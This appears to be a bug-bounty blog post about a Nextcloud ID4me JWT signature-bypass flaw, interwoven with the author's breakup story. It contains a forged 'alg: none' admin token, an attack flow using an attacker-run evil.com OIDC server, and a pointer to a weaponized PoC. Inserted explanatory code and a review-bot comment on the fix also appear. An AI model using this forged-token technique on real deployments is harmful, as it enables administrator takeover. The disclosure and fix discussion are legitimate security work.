June 23, 2026
I Found a 0-Day in Nextcloud… But Couldn't Find One in a Fake Heart
CVE-2026-45156 | $2,500 Bounty | Critical Auth Bypass

By CyberTechAjju
7 min read
"I can find 0-days in main systems… but I couldn't detect the deception running in a human heart."
Author: CyberTechAjju · CVE: CVE-2026-45156 · Advisory: GHSA-qqgv-fqwp-mjpp · HackerOne: #3489490
2 AM. Wednesday. Winter.
Picture this.
Winter. The kind where your fingers freeze on the keyboard but your brain refuses to sleep. It's 2 AM on a Wednesday — because that's how I roll. Wednesday nights = full night hunt mode. Sleep the entire Thursday like a dead process. Repeat weekly.
Headphones on. Arijit Singh sad mashup playing on loop — you know the one. "Tum Hi Ho" fading into "Channa Mereya" fading into "Phir Bhi Tumko Chaahunga."
The irony? At this point, I hadn't been through any breakup. I just vibed to Arijit because his voice hits different at 2 AM on a cold night. I thought I understood those songs. I thought the lyrics were just poetry.
Bro, a few months later I found out — that wasn't poetry. That was prophecy.
Every. Single. Lyric. Started making painful, surgical sense. But that heartbreak chapter comes later.
Right now, at 2 AM, wrapped in a quilt, Arijit crying in my ears, eyes glued to PHP source code — I'm about to find a Critical 0-day in Nextcloud.
The Bug — Explained Like You're 5
What's a JWT?
Think of a JWT like a movie ticket:
```
┌────────────┬──────────────────┬────────────────┐
│ HEADER     │ PAYLOAD          │ SIGNATURE      │
│ Theater    │ Your seat, name  │ Hologram       │
│ info       │ show time        │ PROOF it's     │
│            │                  │ REAL           │
└────────────┴──────────────────┴────────────────┘
```
The signature is the hologram — it proves the ticket wasn't printed on your home printer.
What Nextcloud Did:
They checked the seat number… but never looked at the hologram.
```php
// Split the ticket into parts
[$header, $payload, $signature] = explode('.', $token);
// Read the seat number directly
$plainPayload = json_decode(base64_decode($payload), true);
// THE DEVELOPER LITERALLY WROTE THIS:
/** TODO: VALIATE SIGNATURE! */
// ^^ they even misspelled "VALIDATE" lmao
// Used the unverified name to log in the user
$backendUser = $userMapper->getOrCreate(..., $plainPayload['sub']);
```
The developer wrote a TODO to verify signatures. Then shipped it. And went home.
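To make the difference between "split and decode" and "verify then decode" concrete, here is an added Python example. It is not code from this post, from Nextcloud or from the ID4me app; it reimplements the same pattern in Python with a minimal verifier written for this page. It assumes HS256 with a constructed shared key (`DEMO_KEY`) so that it runs offline; real OIDC ID tokens are normally RS256-signed and checked against the provider's JWKS, which is what the fix in this post does. Function names (`decode_unverified`, `decode_verified`, `sign_hs256`, `demo`) are my own. The same block also illustrates the fix section below: the only lines that change between the two paths are the algorithm allow-list, the signature comparison and the `exp` check.

```python
import base64
import hashlib
import hmac
import json
import time


def b64url_decode(segment):
    """Decode a base64url segment, restoring the '=' padding that JWTs strip."""
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def decode_unverified(token):
    """The pattern from the post: split on '.', base64-decode the payload, trust it.
    The signature segment is unpacked and then never looked at."""
    header, payload, signature = token.split(".")
    return json.loads(b64url_decode(payload))


ALLOWED_ALGS = {"HS256"}  # allow-list; "none" must never be accepted


def decode_verified(token, key, now=None):
    """Verify before trusting: pin the algorithm, check the MAC, then check exp."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, payload_b64, signature_b64 = parts
    header = json.loads(b64url_decode(header_b64))
    alg = header.get("alg")
    if alg not in ALLOWED_ALGS:  # rejects alg=none and any algorithm confusion
        raise ValueError("algorithm not allowed: %r" % alg)
    signing_input = ("%s.%s" % (header_b64, payload_b64)).encode("ascii")
    expected = hmac.new(key, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(signature_b64)):
        raise ValueError("bad signature")
    payload = json.loads(b64url_decode(payload_b64))
    now = int(time.time()) if now is None else now
    if "exp" not in payload or payload["exp"] < now:
        raise ValueError("token expired or missing exp")
    return payload


def sign_hs256(payload, key):
    """Issue a properly signed token (what a legitimate provider would do)."""
    header = {"alg": "HS256", "typ": "JWT"}
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(key, ("%s.%s" % (h, p)).encode("ascii"), hashlib.sha256).digest()
    return "%s.%s.%s" % (h, p, b64url_encode(sig))


# Constructed sample (not from the original): an unsigned alg=none token with an
# empty signature segment, the shape the post describes.
UNSIGNED_ADMIN_TOKEN = (
    b64url_encode(b'{"alg":"none","typ":"JWT"}') + "."
    + b64url_encode(b'{"sub":"admin","exp":9999999999}') + "."
)

DEMO_KEY = b"constructed-demo-key"  # constructed; a real IdP publishes RSA keys via JWKS


def demo():
    """Run both decode paths over the same inputs and report what each accepts."""
    results = {}
    # Naive path: happily returns the attacker-chosen subject.
    results["unverified_sub"] = decode_unverified(UNSIGNED_ADMIN_TOKEN)["sub"]
    # Verified path: the unsigned token is rejected at the algorithm check.
    try:
        decode_verified(UNSIGNED_ADMIN_TOKEN, DEMO_KEY)
        results["verified_rejects_none"] = False
    except ValueError:
        results["verified_rejects_none"] = True
    # Verified path accepts a token the key holder actually signed.
    good = sign_hs256({"sub": "alice", "exp": 2000000000}, DEMO_KEY)
    results["verified_sub"] = decode_verified(good, DEMO_KEY, now=1700000000)["sub"]
    return results


if __name__ == "__main__":
    print(demo())
```

The detection value of this for a reviewer is the shape of `decode_unverified`: any code that reaches `json_decode`/`json.loads` on the middle segment without first touching the third segment and the header's `alg` is the bug, regardless of language.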
Mind Map — The Whole Vulnerability
The Exploit — 4 Simple Steps
The Forged Token:
```python
header = {"alg": "none", "typ": "JWT"}          # No signature algorithm
payload = {"sub": "admin", "exp": 9999999999}   # I'm the admin now
token = base64(header) + "." + base64(payload) + "."
#                                                  ↑
#                                      Signature = NOTHING
```
That's it. A 5-line Python script to become admin on any Nextcloud with ID4me enabled.
The Full Attack:
```
You (attacker) → own evil.com
→ set DNS to point to your OIDC server
→ enter "admin@evil.com" on Nextcloud login
→ Nextcloud contacts your server
→ you return forged JWT {"sub": "admin"}
→ Nextcloud does base64_decode(), trusts it
→ you're admin. GG.
```
Automated PoC Exploit
I've written a fully weaponized Python script that automates this entire flow (detects Nextcloud, extracts CSRF, starts a fake OIDC server, creates an Ngrok tunnel, and fires the forged token).
You can find the full script on my GitHub: CVE-2026-45156 PoC Exploit Repository
(Note: For authorized bug bounty testing only.)
The Fix (6 Lines vs 4 Broken Ones)
```diff
- [$header, $payload, $signature] = explode('.', $data['id_token']);
- $plainPayload = json_decode(base64_decode($payload), true);
- /** TODO: VALIATE SIGNATURE! */
+ use Firebase\JWT\JWT;
+ use Firebase\JWT\JWK;
+ $keys = JWK::parseKeySet(json_decode(file_get_contents($jwksUri), true));
+ $plainPayload = (array) JWT::decode($data['id_token'], $keys);
```
4 lines broke it. 4 lines fixed it.
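Review bot: the `+` lines verify the signature, but nothing in this hunk checks the token's `iss` and `aud` claims; `JWT::decode` only validates `exp`, `nbf` and `iat`, so `$plainPayload['iss']` should be compared with the discovered issuer and `$plainPayload['aud']` with the client ID before `sub` is used for login, otherwise a validly signed token from a different provider or client is accepted. The `file_get_contents($jwksUri)` result is also used unchecked: on a fetch failure it returns `false`, `json_decode(false, true)` yields `null`, and `JWK::parseKeySet(null)` fails with a type error rather than a clear authentication failure; check the fetch result and fail closed. Finally, if the provider's JWKS entries omit `alg`, `JWK::parseKeySet` needs its default-algorithm argument, so consider `JWK::parseKeySet($jwks, 'RS256')` to avoid rejecting otherwise valid key sets.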
Stats
The Real Exploit Was on Me
Now the part I didn't plan on writing. But life said "bro, the blog needs some spice too."
When I found this bug, my HackerOne account was out of signal. I needed to report fast. So I asked someone I deeply trusted — my partner, my "collaborator" — to submit it from her account. I wrote the entire report. Every word, every code snippet, every reproduction step. She clicked Submit. I joined as collaborator.
$2,500 bounty came in. Split between us. All good, right?
Ha ha. No.
The Promises
She made promises. Not just regular promises — we're talking more promises than a Zero Trust Architecture has verification layers. "I'll never break your trust." "You're the only one." "I'm interested in hacking too!" "We'll grow together."
Bro, a Zero Trust model operates on "never trust, always verify." But her promises? They operated on "always trust me, never verify." And like the idiot I am, I implemented the wrong security model for my heart.
The Reality
While I was reversing auth flows at 2 AM in freezing cold…
- She was having spicy conversations with other guys — the kind that would make even an `alg: none` JWT blush
- Taking "classes" from people who literally followed me — imagine that, "studying" with my followers
- Her hobbies changed more frequently than a load balancer rotates servers — one day hacking interested her, the next day someone else interested her. Changing hobbies was her real hobby
- She said she loved hacking. Turns out, the only thing she was hacking was my trust
The Pattern Match
You know what's funny? Before her, I thought "2-3 relationships didn't work out, maybe I'm the problem." After her, the real vulnerability was patched — from my brain:
"It wasn't a bug in me. It was a feature in them."
She lied about her interests to get close. Faked her passions. Pretended to care about my world. Classic social engineering — build rapport, gain trust, extract value, pivot to next target.
I've seen this attack pattern in CTFs. I just never expected it from someone sleeping next to me.
The Arijit Singh Moment
Remember that Arijit Singh sad mashup I was vibing to on that winter night? Back then, "Channa Mereya" was just a nice melody. "Tum Hi Ho" was just background music for coding.
Now? Now every line of those songs hits like a SIGSEGV — straight crash, no recovery. Arijit wasn't singing songs. He was writing debug logs for my future.
I thought those songs were just for listening… I didn't know they'd get implemented in my life too.
The Verdict
Her `commitment_token` had `alg: none`. No signature. No integrity. No verification. And I accepted it like Nextcloud accepted my forged JWT — blindly.
She made more promises than a Zero Trust whitepaper… and broke more than a script kiddie's first exploit.
But here's the thing about forged people — they get invalidated eventually. Mine did.
Why Real Hackers Stay Single
I'm going to say something controversial:
The best hackers I know are single. Not because they can't find someone — but because they learned that `human.trust()` has the worst vulnerability disclosure program.
Think about it:
| Hacking | Relationships |
|----------------------------------|-------------------------------------|
| Find bug → report → get bounty | Find red flag → ignore → get burned |
| Zero Trust Architecture | Zero Trust... but still trusted |
| Exploits get patched | Toxic people don't |
| CVE stays forever in NVD | "I love you" gets deleted |
| Source code doesn't lie | People absolutely do |

_I'm not saying don't fall in love. I'm saying — first make yourself so valuable that whoever betrays you regrets it._
And that's exactly what happened. She has screenshots and drama. I have a CVE in the National Vulnerability Database.
Lessons (Hacking + Life)
For Your Terminal:
- Read TODO comments — Developers confess their sins in them
- `base64_decode()` ≠ security — If JWTs are decoded manually, that's your 0-day
- Test optional features — ID4me was a forgotten corner. Best bugs hide in forgotten corners
- Source code review > scanners — No tool found this. My eyes at 2 AM with Arijit in my ears did
- `explode('.', $jwt)` = red flag — If you see this, start writing your report
For Your Heart:
- Your account. Your report. Always. — Never submit your work from someone else's profile. EVER.
- Implement Zero Trust in life too — Not just in your architecture. Verify people's actions, not their words
- If someone changes hobbies faster than you change branches — that's not a personality, that's social engineering
- Promises without proof = `alg: none` — Anyone can say anything. Where's the signature?
- Real hackers don't need validation from people — Your CVE validates you. NVD validates you. Your skills validate you. Not someone's "I love you" at midnight
- Breakups heal. CVEs are permanent. — She'll forget you. But CVE-2026-45156 will be in NVD till the internet dies
- Stay single until someone matches your energy — Not your followers. Not your bounties. YOUR ENERGY.
Links
- CVE: CVE-2026-45156
- HackerOne: Report #3489490
- Advisory: GHSA-qqgv-fqwp-mjpp
- PoC Exploit Code: GitHub Repository (For Authorized Testing Only)
Quotes I Live By Now
"Forged tokens get invalidated eventually. And so do fake people."
"She promised more than a Zero Trust whitepaper… and delivered less than a TODO comment."
"I couldn't find the 0-day in her heart because she was running a completely different OS than what she advertised."
"Arijit Singh isn't a singer. He's a vulnerability scanner for the heart. And my scan results came back CRITICAL."
"Real hackers don't cry over breakups. They open their laptop and find the next CVE. The NVD remembers you longer than any person ever will."
About Me
CyberTechAjju — Bug Bounty Hunter · Security Researcher · GitHub · CVE-2026-45156 · LinkedIn
Finding 0-days in systems since winter nights. Learning to find them in people since heartbreak. Currently single. Not because I can't find someone — but because my vulnerability scanner for humans is still in beta. If this helped you learn something — about hacking or about life — share it with a fellow hacker. And remember: always verify signatures. In JWT tokens… and in people who say "I love you."